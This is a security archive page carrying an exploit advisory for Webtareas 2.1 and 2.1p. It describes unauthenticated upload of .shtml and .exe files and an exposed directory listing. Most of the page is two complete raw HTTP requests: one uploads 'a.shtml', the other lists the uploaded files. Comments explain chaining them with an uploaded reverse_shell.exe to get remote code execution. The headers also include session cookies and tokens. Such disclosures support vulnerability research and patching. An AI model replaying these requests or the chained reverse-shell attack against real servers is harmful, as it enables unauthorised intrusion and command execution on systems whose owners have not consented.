Webtareas 2.1 / 2.1p File Upload / Information Disclosure

Webtareas 2.1 / 2.1p File Upload / Information Disclosure: Posted Jul 9, 2020; Authored by AppleBois; Webtareas versions 2.1 and 2.1p suffer from unauthenticated file uploads that allow for remote code execution and expose directory listings.; tags | exploit, remote, code execution, info disclosure, file upload; SHA-256 | 50d4e7012c5d0dd6638cdbd956d6d2350c54598bb9e29b1aaf08aea28992ed75; Download | Favorite | View

Webtareas 2.1 / 2.1p File Upload / Information Disclosure

#Authenticated File Upload vulnerability
#Author: AppleBois
#Homepage: https://sourceforge.net/projects/webtareas/
#Affected Version: 2.1 && 2.1p
#Vendors Claim there's a patch on 2.1p but it's vulnerable and been few weeks without response.
#".exe" and ".shtml" is allow to upload 
#Below http request is a file upload reuqest "a.shtml" to server, Unauthenticated user can prompt a "cmd.exe" by clicking the "a.shtml" through crafted URL "http://127.0.0.1:81/Tareas/webtareas/files/Default/a--17.v1.0.shtml"
#More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a

POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 711
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
Connection: close

------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="action"

add
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="attnam1"

a.shtml
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="atttmp1"

C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="c"


------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="ver"

1.0
------WebKitFormBoundaryHtJ36OtVyQuyaY6y--






#Uploaded File Listing Directory
#Author: AppleBois
#Homepage: https://sourceforge.net/projects/webtareas/
#Affected Version: 2.1 && 2.1p
#Vendors Claim there's a patch on 2.1p but it's vulnerable and been few weeks without response.
#Disclose file uploaded by authenticated user.
#Futhur Damage: chain with "File Upload vulnerability", a.shtml and .exe is allow to upload, we can upload a reverse_shell.exe and a.shtml. a.shtml can trigger the reverse_shell.exe
#More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a


GET /Tareas/webtareas/files/Default/ HTTP/1.1
Host: 10.10.10.2:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
Connection: close

Top Authors In Last 30 Days

Red Hat 247 files
indoushka 101 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,775)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,536)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,750)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

Webtareas 2.1 / 2.1p File Upload / Information Disclosure

Webtareas 2.1 / 2.1p File Upload / Information Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Webtareas 2.1 / 2.1p File Upload / Information Disclosure

Share This

Webtareas 2.1 / 2.1p File Upload / Information Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems